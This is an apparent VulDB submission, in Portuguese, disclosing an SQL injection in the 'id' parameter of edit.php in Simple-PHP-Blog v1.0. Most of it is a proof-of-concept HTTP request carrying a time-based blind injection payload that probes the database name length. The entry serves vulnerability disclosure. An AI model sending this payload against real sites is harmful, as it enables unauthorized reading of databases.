| Título | Philip Okugbe Simple-PHP-Blog v1.0 SQL Injection |
|---|
| Descrição | Download and set up this PHP system from https://github.com/Philipinho/Simple-PHP-Blog. Then, in the edit.php file, you will notice that the id parameter is not filtered or forcibly type-casted, which makes it possible for SQL injection attacks.
POC:
POST /edit.php HTTP/1.1
Host: xxxxxxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Edg/x.x.x.x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=lib8291dc1lcn1lh4nrg2d1nti
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
upd=1&id=1+OR+if(length(database())=12,sleep(2),exp(710))--&title=InjectedTitle&description=InjectedDescription&slug=injected-slug
Using this POC, SQL injection and time delay injection can be employed to inject into the length of the database. The duration of the delay is three times the value of 'x' in 'sleep(x)'. |
|---|
| Fonte | ⚠️ https://github.com/woshinenbaba/CVE-/issues/1 |
|---|
| Utilizador | xiaofeifei (UID 92996) |
|---|
| Submissão | 26/11/2025 12h35 (há 5 meses) |
|---|
| Moderação | 07/12/2025 18h51 (11 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 334669 [Philipinho Simple-PHP-Blog até 94b5d3e57308bce5dfbc44c3edafa9811893d958 /edit.php Injeção SQL] |
|---|
| Pontos | 20 |
|---|